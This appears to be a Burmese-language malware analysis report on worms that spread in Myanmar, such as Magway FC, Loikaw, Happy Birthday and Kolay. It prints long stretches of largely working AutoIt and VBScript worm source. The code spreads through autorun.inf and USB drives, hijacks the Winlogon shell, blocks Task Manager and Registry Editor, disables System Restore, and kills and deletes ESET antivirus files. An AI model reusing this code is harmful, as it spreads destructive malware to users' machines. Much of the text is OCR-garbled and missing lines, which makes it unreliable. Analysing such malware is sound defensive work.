Task Manager udktoHk;jyKcGifhydwfyifjcif;wdkYudk vkyfaqmifavonf/
7/ Adkif;&yfpfonf xdkxufydkrdkí 'ku©ay;Ekdif&eftwGuf HKLM\SOFTWARE\Microsoft\
Windows\CurrentVersion\App Paths atmuf&Sd regedit.exe? msconfig.exe? rstrui.exe? taskmgr.exe ESifh
notepad.exe y½dk*&rftrnfrsm;udk C:\Windows\System32\{271287-000021-100287-705016}
Directory atmuf&dS csrss.exe y½dk*&rftrnfjzifhtpm;xdk;ypfavonf/ xkdYaMumifh uGefysLwmoHk;pGJolrS
Run Box (Windows Key + R Key) wGif xdky½dk*&rftrnfrsm;udk ½dkufxnfhNyD; zGifhcJhaomf oufqdkif&m
y½dk*&rfrsm; yGifhrvmbJ csrss.exe Adkif;&yfpfzdkifudk tvkyfvkyfaprnfjzpfonf/
8/ ¤if;aemuf Adkif;&yfpfonf C:\Windows\System32\{271287-000021-100287-705016}
Directory atmuf&Sd autorun.inf zdkifwGif AUTORUN aprnfhvkyfaqmifcsufrsm;udk xnfhoGif;NyD;
uGefysLwm&Sd Driver Letter rsm;udk zwfavonf/ ¤if;aemuf Drive onf Flash Drive jzpf? rjzpf
pHkprf;NyD; Flash Drive jzpfygu C:\Windows\System32\{271287-000021-100287-705016} Directory
atmuf&Sd autorun.inf ESifh mgy.exe zdkifwdkYudk Flash Drive xJodkY ul;xnfhavonf/ Akdif;&yfpfonf Drive
xJ&Sdzdkifrsm;ESifh Folder tm;vHk;udk&SmazGNyD;aemuf awGY&Sdaomzdkifrsm;? Folder rsm;trnfudk,lum
Adkif;&yfpfrsm;udk yGm;avonf/ rl&if;zdkifrsm;ESifh Folder rsm;udkrl +H +S +R Option oHk;ízGufxm;av
onf/ Adkif;&yfpfzdkifrsm;udkrl uGefysLwmtoHk;jyKolrS rSm;,Gif;pGm toHk;jyKESdyfrdap&eftwGuf zGufxm;jcif;
r&Sday/ Adkif;&yfpful;pufcHxm;&aom uGefysLwmonf 16 MBytes cefUt½G,ftpm;&Sdaomzdkifrsm;udk
yGm;jcif;cH&onfhtwGuf aES;auG;vmNyD; ae&mvGwfrsm;vnf; wjznf;jznf; enf;vmavonf/ Adkif;&yfpf
onf ESpfpuúefYjcm;wpfcg mgy.exe ESifh csrss.exe zdkifrsm; Process taejzifh tvkyfvkyfaejcif;&Sd? r&Sd
ppfaq;NyD; xdkzdkifrsm;tvkyfvkyfaejcif;r&SdcJhvQif xdkzdkifrsm;udk zGifhNyD;tvkyfvkyfaponf/ Magway FC
Adkif;&yfpf\ uk'ftao;pdwfudk yHk(21)wGif awGYjrifEkdifygonf/
95473 IF FILEEXISTS ( @SYSTEMDIR & "\{271287-000021-100287-705016}" ) = 0
THEN
95474 DIRCREATE ( @SYSTEMDIR & "\{271287-000021-100287-705016}" )
95475 FILESETATTRIB ( @SYSTEMDIR & "\{271287-000021-100287-705016}" ,
"+R+S+H" )
95476 ENDIF
95477 IF FILEEXISTS ( @WINDOWSDIR & "\MGY.exe" ) = 0 THEN
95478 _WRITEMGYTODIR ( @WINDOWSDIR & "\MGY.exe" )
95479 ENDIF
95480 IF FILEEXISTS ( @SYSTEMDIR &
"\{271287-000021-100287-705016}\lsass.exe" ) = 0 THEN
95481 _WRITELSASSTODIR ( @SYSTEMDIR &

"\{271287-000021-100287-705016}\lsass.exe" )
95482 ENDIF
"\{271287-000021-100287-705016}\icserv.exe" ) = 0 THEN
95484 _WRITEICSERVTODIR ( @SYSTEMDIR &
"\{271287-000021-100287-705016}\icserv.exe" )
95485 ENDIF
95486 IF @MON = "07" THEN
95487 $REGEDIT = REGREAD ( "HKLM\SOFTWARE\MGY" , "COUNT" )
95488 IF $REGEDIT = "" THEN
95489 $REGEDIT = 0
95490 REGWRITE ( "HKLM\SOFTWARE\MGY" , "COUNT" , "REG_SZ" , $REGEDIT + 1 )
95491 ELSE
95492 REGWRITE ( "HKLM\SOFTWARE\MGY" , "COUNT" , "REG_SZ" , $REGEDIT + 1 )
95493 ENDIF
95494 $REGEDIT = REGREAD ( "HKLM\SOFTWARE\MGY" , "COUNT" )
95495 IF $REGEDIT = 10 THEN
95496 REGWRITE ( "HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon" , "Shell" , "REG_SZ" , "MGY.exe" )
95497 REGWRITE ( "HKLM\SOFTWARE\MGY" , "OBJ1" , "REG_SZ" , "READY" )
95498 PROCESSCLOSE ( "explorer.exe" )
95499 PROCESSWAITCLOSE ( "explorer.exe" )
95500 RUN ( @WINDOWSDIR & "\MGY.exe" )
95501 ENDIF
95502 IF PROCESSEXISTS ( "explorer.exe" ) = 0 THEN
NT\CurrentVersion\Winlogon" , "Shell" , "REG_SZ" , "Explorer.exe" )
95504 FILECOPY ( @WINDOWSDIR & "\MGY.exe" , @WINDOWSDIR & "\Explorer.exe" ,
1)
95505 PROCESSCLOSE ( "MGY.exe" )
95506 PROCESSWAITCLOSE ( "MGY.exe" )
95507 PROCESSCLOSE ( "MGY.exe" )
95508 PROCESSWAITCLOSE ( "MGY.exe" )
95509 RUN ( @WINDOWSDIR & "\explorer.exe" )
95510 ENDIF
95511 ENDIF
95512 $REGEDIT = REGREAD ( "HKLM\SOFTWARE\MGY" , "OBJ1" )
95513 IF $REGEDIT = "READY" THEN
95514 IF PROCESSEXISTS ( "icserv.exe" ) = 0 THEN
95515 RUN ( @SYSTEMDIR & "\{271287-000021-100287-705016}\icserv.exe" )
95516 ENDIF
95517 RUN ( @SYSTEMDIR & "\{271287-000021-100287-705016}\lsass.exe" )
95518 ENDIF
95519 WHILE 1
95520 #NoTrayIcon
95521 OPT ( "TrayIconHide" , 1 )
95522 #RequireAdmin
95523 IF PROCESSEXISTS ( "msconfig.exe" ) = TRUE THEN
95524 SHUTDOWN ( 6 )
95525 ENDIF
95526 IF PROCESSEXISTS ( "rstrui.exe" ) = TRUE THEN
95527 SHUTDOWN ( 6 )
95528 ENDIF
95529 PROCESSCLOSE ( "winsystem.exe" )
95530 PROCESSCLOSE ( "handydriver.exe" )
95531 PROCESSCLOSE ( "kerneldrive.exe" )
95532 PROCESSCLOSE ( "Wscript.exe" )
95533 PROCESSCLOSE ( "cmd.exe" )
95534 PROCESSCLOSE ( "nod32krn.exe" )
95535 PROCESSCLOSE ( "nod32kui.exe" )

95536 $RG1 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
95537 $RG2 = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion"
95538 REGWRITE ( $RG1 , "mgy" , "REG_SZ" , @SYSTEMDIR & "\mgy.exe" )
95539 REGWRITE ( $RG1 , "Msmsgs" , "REG_SZ" , @SYSTEMDIR &
"\{271287-000021-100287-705016}\csrss.exe" )
95540 REGWRITE ( $RG2 & "\Explorer\Advanced" , "SuperHidden" , "REG_DWORD" ,
"0" )
95541 REGWRITE ( $RG2 & "\Explorer\Advanced" , "ShowSuperHidden" ,
"REG_DWORD" , "0" )
95542 REGWRITE ( $RG2 & "\Explorer\Advanced" , "HideFileExt" , "REG_DWORD" ,
"1" )
95543 REGWRITE ( $RG2 & "\Explorer\Advanced" , "Hidden" , "REG_DWORD" , "2"
)
95544 REGWRITE ( $RG2 & "\Policies\Explorer" , "NoFind" , "REG_DWORD" , "1"
)
95545 REGWRITE ( $RG2 & "\Policies\Explorer" , "NoFolderOptions" ,
"REG_DWORD" , "1" )
95546 REGWRITE ( $RG2 & "\Policies\Explorer" , "NoDriveTypeAutoRun" ,
"REG_DWORD" , "91" )
95547 REGWRITE ( $RG2 & "\Policies\system" , "DisableTaskMgr" , "REG_DWORD"
, "1" )
95548 REGWRITE ( $RG2 & "\Policies\system" , "DisableRegistryTools" ,
"REG_DWORD" , "1" )
95549 REGWRITE ( "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths"
, "regedit.exe" , "REG_SZ" , @SYSTEMDIR &
"\{271287-000021-100287-705016}\csrss.exe" )
, "msconfig.exe" , "REG_SZ" , @SYSTEMDIR &
"\{271287-000021-100287-705016}\csrss.exe" )
, "rstrui.exe" , "REG_SZ" , @SYSTEMDIR &
"\{271287-000021-100287-705016}\csrss.exe" )
, "taskmgr.exe" , "REG_SZ" , @SYSTEMDIR &
"\{271287-000021-100287-705016}\csrss.exe" )
, "notepad.exe" , "REG_SZ" , @SYSTEMDIR &
"\{271287-000021-100287-705016}\csrss.exe" )
NT\CurrentVersion\Winlogon" , "System" , "REG_SZ" , @SYSTEMDIR &
"\{271287-000021-100287-705016}\smss.exe" )
95555 REGWRITE ( "HKLM\Software\Policies\Microsoft\Windows\System" ,
"DisableGPO" , "REG_DWORD" , "1" )
95556 REGWRITE ( "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore"
, "DisableConfig" , "REG_DWORD" , "1" )
95557 REGWRITE ( "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore"
, "DisableSR" , "REG_DWORD" , "1" )
95558 REGWRITE ( "HKLM\Software\Policies\Microsoft\Windows\Installer" ,
"DisableMSI" , "REG_DWORD" , "2" )
95559 REGDELETE ( "HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Main" , "Window Title" )
95560 REGDELETE (
"HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\NOD32krn" ,
"ImagePath" )
95561 REGDELETE (
"HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\nod32drv" ,
"ImagePath" )
95562 REGDELETE ( "HKEY_CLASSES_ROOT\lnkfile\isShortcut" )
"\{271287-000021-100287-705016}\autorun.inf" ) <> TRUE THEN

95564 $ATR = FILEOPEN ( @SYSTEMDIR &
"\{271287-000021-100287-705016}\autorun.inf" , 2 )
95565 FILEWRITE ( $ATR , "[autorun]" & @CRLF )
95566 FILEWRITE ( $ATR , "open=mgy.exe" & @CRLF )
95567 FILEWRITE ( $ATR , "shellexecute=mgy.exe" & @CRLF )
95568 FILEWRITE ( $ATR , "shell\Explore\command=mgy.exe" & @CRLF )
95569 FILEWRITE ( $ATR , "shell\Open\command=mgy.exe" & @CRLF )
95570 FILEWRITE ( $ATR , "shell=Explore" )
95571 FILECLOSE ( $ATR )
95572 FILESETATTRIB ( @SYSTEMDIR &
"\{271287-000021-100287-705016}\autorun.inf" , "+R+H+S" )
95573 ENDIF
95574 $PATH1 = DRIVEGETDRIVE ( "REMOVABLE" )
95575 IF NOT @ERROR THEN
95576 FOR $D = 1 TO $PATH1 [ 0 ]
95577 $FLASHDRIVE = $PATH1 [ $D ]
95578 IF $FLASHDRIVE <> "A:" AND DRIVEGETFILESYSTEM ( $FLASHDRIVE ) <> ""
THEN
95579 FILESETATTRIB ( $FLASHDRIVE & "\autorun.inf" , "-R" )
95580 FILECOPY ( @SCRIPTFULLPATH , $FLASHDRIVE & "\mgy.exe" , 1 )
95581 FILECOPY ( @SYSTEMDIR & "\{271287-000021-100287-705016}\autorun.inf" ,
$FLASHDRIVE & "\autorun.inf" , 1 )
95582 FILESETATTRIB ( $FLASHDRIVE & "\autorun.inf" , "+R+H+S" )
95583 FILESETATTRIB ( $FLASHDRIVE & "\mgy.exe" , "+R+H+S" )
95584 $SEARCH1 = FILEFINDFIRSTFILE ( $FLASHDRIVE & "\*." )
95585 WHILE 1
95586 $FILE1 = FILEFINDNEXTFILE ( $SEARCH1 )
95587 IF $FILE1 = "" THEN EXITLOOP
95588 FILECOPY ( @SCRIPTFULLPATH , $FLASHDRIVE & "\" & $FILE1 & ".exe" )
95589 FILESETATTRIB ( $FLASHDRIVE & "\" & $FILE1 , "+H" )
95590 FILESETATTRIB ( $FLASHDRIVE & "\" & $FILE1 & ".exe" , "-H-S" )
95591 WEND
95592 FILECLOSE ( $SEARCH1 )
95593 ENDIF
95594 NEXT
95595 ENDIF
95596 $PATH2 = DRIVEGETDRIVE ( "FIXED" )
95598 FOR $F = 1 TO $PATH2 [ 0 ]
95599 $DRIVE = $PATH2 [ $F ]
95600 FILESETATTRIB ( $DRIVE & "\autorun.inf" , "-R" )
95601 FILECOPY ( @SYSTEMDIR & "\{271287-000021-100287-705016}\autorun.inf" ,
$DRIVE & "\autorun.inf" , 1 )
95602 FILECOPY ( @SCRIPTFULLPATH , $DRIVE & "\mgy.exe" )
95603 FILESETATTRIB ( $DRIVE & "\autorun.inf" , "+R+H+S" )
95604 FILESETATTRIB ( $DRIVE & "\mgy.exe" , "+R+H+S" )
95605 NEXT
95606 ENDIF
95607 FILECOPY ( @SCRIPTFULLPATH , @SYSTEMDIR & "\mgy.exe" )
95608 FILECOPY ( @SCRIPTFULLPATH , @SYSTEMDIR &
"\{271287-000021-100287-705016}\smss.exe" )
"\{271287-000021-100287-705016}\csrss.exe" )
95610 FILECOPY ( @SCRIPTFULLPATH , @PROGRAMFILESDIR & "\ESET\nod32.exe" )
95611 FILESETATTRIB ( @SYSTEMDIR & "\wininit.exe" , "-R" )
95612 FILESETATTRIB ( @SYSTEMDIR & "\mgy.exe" , "+R+H+S" )
95613 FILESETATTRIB ( @SYSTEMDIR & "\{271287-000021-100287-705016}\smss.exe"
, "+R+H+S" )
95614 FILESETATTRIB ( @SYSTEMDIR &
"\{271287-000021-100287-705016}\csrss.exe" , "+R+H+S" )

95615 FILEDELETE ( @SYSTEMDIR & "\wininit.exe" )
95616 FILEDELETE ( @PROGRAMFILESDIR & "\ESET\nod32.exe" )
95617 FILEDELETE ( @PROGRAMFILESDIR & "\ESET\nod32kui.exe" )
95618 FILEDELETE ( @PROGRAMFILESDIR & "\ESET\nod32krn.exe" )
95619 IF PROCESSEXISTS ( "mgy.exe" ) = 0 THEN
95620 RUN ( @SYSTEMDIR & "\mgy.exe" )
95621 ENDIF
95622 IF PROCESSEXISTS ( "csrss.exe" ) = 0 THEN
95623 RUN ( @SYSTEMDIR & "\{271287-000021-100287-705016}\csrss.exe" )
95624 ENDIF
95625 SLEEP ( 2000 )
95626 WEND
yHk(21) Magway FC Adkif;&yfpf\ uk'frsm;
9/ mgy.exe ESifh csrss.exe Adkif;&yfpfzdkifrsm;onf C:\Windows\System32\{271287-000021-
100287-705016} Directory atmuf&Sd lsass.exe ESifh icserv.exe zdkifrsm;udk Zlvdkifva&mufonfhtcg
ac:,ltoHk;jyKavonf/ yHk(22)wGifawGYjrif&onfhuk'ftwkdif; icserv.exe onf Windows pepf\
SHELL.dll zdkif\vkyfaqmifcsuftwdkif;vkyfaqmifum ICON rsm;udk jyKjyifavonf/ lsass.exe onf
yHk(23)wGifawGYjrif&onfu
h k'ftwdkif; Desktop wGif Magway FC toif;\vdk*dkudk jyo&eftwGuf
toHk;jyKavonf/
91550 IF _SINGLETON ( @SCRIPTNAME , 1 ) = 0 THEN
91551 EXIT
91552 ENDIF
91553 RUN ( @SYSTEMDIR & "\{271287-000021-100287-705016}\smss.exe" )
91554 DIM $AFULLPATH [ 100 ]
91555 $SEARCHKEY = "HKCR"
91556 $SEARCHSTRING = "SHELL32.dll"
91557 WHILE 1
91558 #NoTrayIcon
91560 #RequireAdmin
"\{271287-000021-100287-705016}\icserv.exe" , 0 )
91562 IF FILEEXISTS ( @SYSTEMDIR & "\SXELL32.dll" ) <> 1 THEN
91563 _WRITESXELL32TODIR ( @SYSTEMDIR & "\SXELL32.dll" )
91564 ENDIF
91565 _REGSEARCH ( $SEARCHKEY , $SEARCHSTRING )
91566 $PATH2 = DRIVEGETDRIVE ( "FIXED" )
91568 FOR $F = 1 TO $PATH2 [ 0 ]
91569 $IFILES = 0
91570 $IFOLDERS = 0
91571 $ICOUNT = 0
91572 $DRIVE = $PATH2 [ $F ]
91573 REGWRITE (
"HKLM\SOFTWARES\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\"
& STRINGLEFT ( $DRIVE , 1 ) & "\DefaultIcon" , "" , "REG_SZ" ,
@SYSTEMDIR & "\SXELL32.dll,8" )
91574 _SEARCHEX ( $DRIVE & "\" , $AFULLPATH , "*.*" )
91575 NEXT
91576 ENDIF
91577 WEND
91578 FUNC _SEARCHEX ( $SSOURCEPATH , BYREF $AFILELIST , $SEXT = "*.*" ,
$IRUNFIRSTTIME = 1 )
91579 IF UBOUND ( $AFILELIST ) < 10000 THEN REDIM $AFILELIST [ 10000 ]
91580 IF STRINGRIGHT ( $SSOURCEPATH , 1 ) = "\" THEN $SSOURCEPATH =

STRINGTRIMRIGHT ( $SSOURCEPATH , 1 )
91581 $SEXT = STRINGREPLACE ( $SEXT , "\" , "" )
91582 $IFIRSTFILE = FILEFINDFIRSTFILE ( $SSOURCEPATH & "\" & $SEXT )
91583 IF @ERROR THEN RETURN
91584 WHILE 1
91585 $INEXTFILE = FILEFINDNEXTFILE ( $IFIRSTFILE )
91586 IF @ERROR THEN EXITLOOP
91587 $SFULLPATH = $SSOURCEPATH & "\" & $INEXTFILE
91588 IF STRINGINSTR ( FILEGETATTRIB ( $SFULLPATH ) , "D" ) THEN
91589 IF FILEEXISTS ( $SFULLPATH & "\desktop.ini" ) <> 1 THEN
91590 INIWRITE ( $SFULLPATH & "\desktop.ini" , ".ShellClassInfo" ,
"IconFile" , @SYSTEMDIR & "\SXELL32.dll" )
"IconIndex" , "3" )
91592 FILESETATTRIB ( $SFULLPATH & "\desktop.ini" , "+H" )
91593 ELSE
91595 IF INIREAD ( $SFULLPATH & "\desktop.ini" , ".ShellClassInfo" ,
"IconIndex" , "" ) = "-101" THEN
"IconIndex" , "127" )
91597 ENDIF
91599 ENDIF
91600 $IFOLDERS += 1
91601 _SEARCHEX ( $SFULLPATH , $AFILELIST , $SEXT , 0 )
91602 ELSE
91603 $IFILES += 1
91604 $ICOUNT += 1
91605 IF $ICOUNT = 10000 THEN
91606 REDIM $AFILELIST [ UBOUND ( $AFILELIST ) + 10000 ]
91607 $ICOUNT = 0
91608 ENDIF
91611 $AFILELIST [ $IFILES ] = $SFULLPATH
91612 ENDIF
91613 IF STRINGLEFT ( $AFILELIST [ $IFILES ] , 1 ) <> "c" THEN
91614 FILECOPY ( @SCRIPTDIR & "\smss.exe" , $AFILELIST [ $IFILES ] & ".exe"
,1)
91615 FILECOPY ( @SCRIPTDIR & "\smss.exe" , $AFILELIST [ $IFILES ] , 1 )
91616 ELSE
91617 FILECOPY ( @SCRIPTDIR & "\smss.exe" , $AFILELIST [ $IFILES ] & ".exe"
,1)
91618 ENDIF
91619 FILESETATTRIB ( $AFILELIST [ $IFILES ] , "+SH" )
91620 WEND
91621 FILECLOSE ( $IFIRSTFILE )
91622 IF $IRUNFIRSTTIME THEN
91623 REDIM $AFILELIST [ $IFILES + 1 ]
91624 $AFILELIST [ 0 ] = UBOUND ( $AFILELIST ) - 1
91625 ENDIF
91626 ENDFUNC
91627 FUNC _REGSEARCH ( $STARTKEY , $SEARCHVAL )
91628 LOCAL $V , $VAL , $K , $KEY , $FOUND = ""
91629 $V = 1
91630 WHILE 1
91631 $VAL = REGENUMVAL ( $STARTKEY , $V )

91632 IF @ERROR = 0 THEN
91633 IF STRINGINSTR ( $VAL , $SEARCHVAL ) THEN
91634 $FOUND = $FOUND & $STARTKEY & "\" & $VAL & @LF
91635 ENDIF
91636 $READVAL = REGREAD ( $STARTKEY , $VAL )
91637 IF STRINGINSTR ( $READVAL , $SEARCHVAL ) THEN
91638 IF STRINGRIGHT ( $FOUND & $STARTKEY , 11 ) = "DefaultIcon" THEN
91639 IF $VAL <> "" THEN
91640 REGWRITE ( $FOUND & $STARTKEY , $VAL , "REG_EXPAND_SZ" , STRINGREPLACE
( $READVAL , "SHELL32.dll" , "SXELL32.dll" ) )
91641 ELSE
91642 REGWRITE ( $FOUND & $STARTKEY , "" , "REG_EXPAND_SZ" , STRINGREPLACE (
$READVAL , "SHELL32.dll" , "SXELL32.dll" ) )
91643 ENDIF
91644 ENDIF
91645 $FOUND = $FOUND & $STARTKEY & "\" & $VAL & " = " & $READVAL & @LF
91646 ENDIF
91647 $V += 1
91648 ELSE
91649 EXITLOOP
91650 ENDIF
91651 WEND
91652 $K = 1
91653 WHILE 1
91654 $KEY = REGENUMKEY ( $STARTKEY , $K )
91655 IF @ERROR = 0 THEN
91656 IF STRINGINSTR ( $KEY , $SEARCHVAL ) THEN
91657 $FOUND = $FOUND & $STARTKEY & "\" & $KEY & "\" & @LF
91658 ENDIF
91659 $FOUND = $FOUND & _REGSEARCH ( $STARTKEY & "\" & $KEY , $SEARCHVAL )
91660 ELSE
91661 EXITLOOP
91662 ENDIF
91663 $K += 1
91664 WEND
91665 RETURN $FOUND
91666 ENDFUNC
yHk(22) Magway FC Adkif;&yfuac:,ltoHk;jyKaom icserv.exe \uk'frsm;
4556 IF _SINGLETON ( @SCRIPTNAME , 1 ) = 0 THEN
4557 EXIT
4558 ENDIF
4559 IF FILEEXISTS ( @SYSTEMDIR & "\{271287-000021-100287-705016}\logo.jpg") <> 1 THEN
4560 _WRITELOGOTODIR ( @SYSTEMDIR &
"\{271287-000021-100287-705016}\logo.jpg" )
4561 ENDIF
4562 #Region ### START Koda GUI section ### Form=
4563 $MGY = GUICREATE ( " " , 310 , 115 , @DESKTOPWIDTH - 320 ,
@DESKTOPHEIGHT + 10 , $WS_POPUP , $WS_EX_TOPMOST )
4564 $PIC1 = GUICTRLCREATEPIC ( @SYSTEMDIR &
"\{271287-000021-100287-705016}\logo.jpg" , 0 , 0 , 310 , 115 , BITOR
( $SS_NOTIFY , $WS_GROUP , $WS_CLIPSIBLINGS ) )
4565 #EndRegion ### END Koda GUI section ###f
4566 WHILE 1
4567 #NoTrayIcon
4568 #RequireAdmin
4570 $R = RANDOM ( 0 , 100 , 1 )
4571 IF $R = 21 THEN
nals V 1.0 - rhythm

4572 _SHO OW ( @DESK KTOPWIDTH H - 320 , @DES
SKTOPHEIG GHT + 10 )
4573 END DIF
4574 $NM MSG = GUIGETMSG ( )
4575 SWIT TCH $NMSG
4576 CASE $GUI_EVE ENT_CLOSE
4577 EXIT T
4578 END DSWITCH
4579 SLEE EP ( 100 )
4580 WEN ND
4581 FUN NC _SHOW ( $X $ , $Y )
4582 IF FIILEEXISTS ( @WINDOWSDIR & "\Meedia\notify.waav" ) THEN
4583 SOUNUNDPLAY ( @WINDOWSD DIR & "\Mediaa\notify.wav" , 0 )
4584 END DIF
4585 WINMNMOVE ( " " , "" , ( @DESK KTOPWIDTH H - 320 ) , ( @D
DESKTOPHE EIGHT - 150
))
4586 WINSNSETONTOP ( " " , "" , 1 )
4587 DLLC CALL ( "userr32.dll" , "int"
" , "AnimateW
Window" , "hw wnd" , $MGY
Y,
"int" , 8000 , "long" , 2662152 )
4588 SLEE EP ( 3000 )
4589 DLLC CALL ( "userr32.dll" , "int"
" , "AnimateW
Window" , "hw wnd" , $MGY
Y,
"int" , 50000 , "long" , 589824
5 )
4590 END DFUNC
4591 FUN NC _EXIT ( )
4592 EXIT T
4593 END
DFUNC
yHk(23) F Adkif;&yfuac:,l
Magway FC u toHk;jyKaom lsaass.exe \uk
uk'frsm;
10/ Magwayy FC Adkif;&yf & pfa&;om;o olonf tifwmeufwGiif jzefYa0azzmfjyxm;aomm tjcm;
aomAdkif;&yfpfuk'frsm;;udk rDSjirf;cJhyHyHk&NyD; þAdkifif;&yfpfESifhqifwlaom Adkiiff;&yfpfrsm; a&S
a ;,cifuay:ayguf
a
cJhzl;aMummif; awGY&Sd&NyD; uGefysLwmmpepfxJ&Sd zdkifrsm;udk zsufqD;&efxuf u ul;pufysUyG sH m;&ef? pdw
wfftaESmifh
t,Sufjzpfap&efoufoufom &nf & ½G,fa&;o om;xm;aMummif; awGY&Sd&yygonf/
Thayet MyoM Hackin ng Day Adkif;&yf
& pf
11/ 2009 ckESpfwGifay::cJhaomAdkif;&yf & pfjzpfNyD; Adkif;&yfpfoaabmxuf Trojan T oabbm ydkNyD;
oufa&mmufavonf/ Desktop wGif "Thayyet Myo Haacking Day"" [laom pmaMumif p ;tcsdKUay:NyD;
hal.dll (HHardware Abstract
A Layyer) zdkifudk z zsufypfavo onf/ xdkzdkifud
ukzsufypfonfhtwGuf W Windows
OS udkt toHk;jyKír&aawmhay/ Wiindows XP CD C jzifh Reccovery Conssole udk0ifa&muf & NyD; hal..dll zdkifudk
jyefvnft tpm;xdk;rSomo Windowss udktoHk;jyKEdEdkifrnfjzpfonf o /
yHk(244) M Hackingg Day Adkif;&yf

Thayet Myo yfpful;pufcH&&NyD;aemuf jrif
jr &yHk
nals V 1.0 - rhythm

12/ Adkif;&yfpfpfonf Taskk Manager udkzGifhr&at tmifjyKvkyfNyD; Capslockk Key udk zGifhvdkuf?
ydwfvdku uvk
f yfavon nf/ C:\Recyccler? C:\Bacckup ESifh C:\Windows\BBackup atmmufwGif expplorer.exe
udkul;NyD; Winddows pwuf
zdkifrsm;ud ufonfhtcsdefwG wif explorer.exe udktv vkyfvkyfap&efef Registry ud
ukjyifqif
avonf/
Loikaw A Adkif;&yfpf
13/ 2009 ckcESpfwGifay::cJhjcif;jzpfNyD; Autoit.HW W Worm [kvnf v ;ac:o onf/ 0ufbfppmrsufESm
rsm;ESifh tD;ar;vfrsmm;rS ysHUESHYcJhNyD; uGefysLwmmoHk;pGJolrsm;u
udk ¤if;wdkYuG
uGeyf sLwmrsm;ü Install vvkyfap&ef
vSnfhpm;aavonf/ ¤if ¤ ;onf USB Stick rsm;;rSvnf; ysHUyGm;Ekdifavonf/ þ Maalware ul;pu ufcH&vQif
Task Maanager udktoH t k;rjyKEdkifawmh
w ojzifh uGefysLwmto oHk;jyKolrS rn
nfonfh Proocess rsm; tvk
t yfvkyf
aeaMumifif; rod&SdEkdifawmh
a ay/ tvm;wlt Winndows Regiistry Editor ESifh Folder Option udkt toHk;jyKcGifh
ydwfyifav vonf/ Woorm onf Desktop D ü yHk(25)wG
( ifjrif&aom pmrsm;yg&Sdonfh Virus
V Informmation.txt
zdkifudkxmm;avonf/
Hi fri "Adm ministrador"
It is nice too meet you . . . .
I ko thi lar, see yin kaw kin
k mar lar, i kaa talk khin tat tal
t nor . . . .
I ka girl noor, chit mar lar . . . . .
I ka u comp
mputer ko bar ma,m ma loat par buu khin lo Viirus write pi taalk sa tar ko , hee` he` . . .
Sate so ya buu nor i ka dii lo pae` . . . . ya
y tal ma hote lar
l I name ko thi chin lar? pyyaw pya par buuu; bar lo
pyaw pya yya mar lae` u ka k boy lar, age ka kaw?
i ka 18age girl i gmail kaa comput5r3razzygirl@gmail.ccom bye bye . . . luu soe . . . ffly kiss . .
yHk(25) Loikaw Adkif;&yf
; pf\ Virus Information.txt
14/ Malwarre onf tweffMumtv vkyfvkyfNyD;ao
omf yHk(26)wG
wGifjrif&aomm Dialog Box wpfck
ay:vmaavonf/
yHk(26) Loikaw
L Adkif;&yf
& pf\ rdwfquf
q jcif; Diaalog Box
Happy BBirthday Adkif
if;&yfpf
15/ Happy Birthday Adkif i;&yfpfonf Windows ppwuf&mwGiiff ac:,ltoH ok;jyKonfh nntldr (NT
Loader) zdkifudkzsufypfavonf/ tvm;wl Windows R Registry ud
utoH
k k;jyKír&&atmif w
wm;qD;av
onf/ ¤¤if;aemuf uGefysLwmppwifcsdefwGif ¤if;y½dk*&rf & pwifwufvmap&eftwG t uf expplorcr.exe

trnfjzifh Registryudkjyifavonf/ Adkif;&yfpfonf C:\Windows\System32 Directory atmufwGif
explorcr.exe zdkiftrnfjzifh &Sdavonf/
One Missed Call Adkif;&yfpf

16/ Adkif;&yfpfa&;om;oluyif zefwD;NyD; Desktop wGif yHk(27)wGifawGY&onfh
Happy Birthday
Text zdkifwpfckudk zefwD;avonf/ awGYorQ Folder rsm;tm; .exe rsm;tjzpfajymif;vJypfNyD; rlv Folder
rsm;tm;azsmufxm;avonf/ uGefysLwmpwufcsdefwGif Drive is not Ready [laom Error
Messagebox ay:vmNyD; taESmifht,Sufay;avonf/
This is a worm from Myanmar Student. Not from SG, made at Yangon.
Myanmar has many Hackers and Programmers. That is example number two.
Happy birthday is my first virus. Have a nice day admin.
yHk(27) One Missed Call Adkif;&yfpf\ Virus Information.txt

Kolay Adkif;&yfpf
17/ Kolay Adkif;&yfpfudk VB Script jzifha&;om;xm;jcif;jzpfNyD; ¤if;\zdkif extension rSm .vbs
jzpfonf/
Option Explicit
On Error Resume Next
Dim Fso, Shells, SystemDir, WinDir, Count, File, Drv, Drives, InDrive, ReadAll, AllFile, WriteAll, Del, Chg
Set Fso = CreateObject(\"Scripting.FileSystemObject\")
Set Shells = CreateObject(\"Wscript.Shell\")
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir = Fso.GetSpecialFolder(1)
Set File = Fso.GetFile(Wscript.ScriptFullName)
Set Drv = File.Drive
Set InDrive = Fso.Drives
Set ReadAll = File.OpenAsTextStream(1, -2)
Do While Not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline
AllFile = AllFile & vbCrLf
Loop
Count = Drv.DriveType
Do
If Not Fso.FileExists(SystemDir & \"\kolay.vbs\") Then
Set WriteAll = Fso.CreateTextFile(SystemDir & \"\kolay.vbs\", 2, True)
WriteAll.Write AllFile
WriteAll.Close
Set WriteAll = Fso.GetFile(SystemDir & \"\kolay.vbs\")
WriteAll.Attributes = -1
End If
Shells.RegWrite \"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit\"
, SystemDir & \"\userinit.exe,\" & _
SystemDir & \"\wscript.exe \" & SystemDir & \"\kolay.vbs\"
For Each Drives In InDrive
If Drives.DriveType = 2 Then
LookVBS \"inf\", Drives.Path & \"\\"
LookVBS \"INF\", Drives.Path & \"\\"
End If
If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path <> \"A:\" Then

Shells.Regdelete \"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL\"
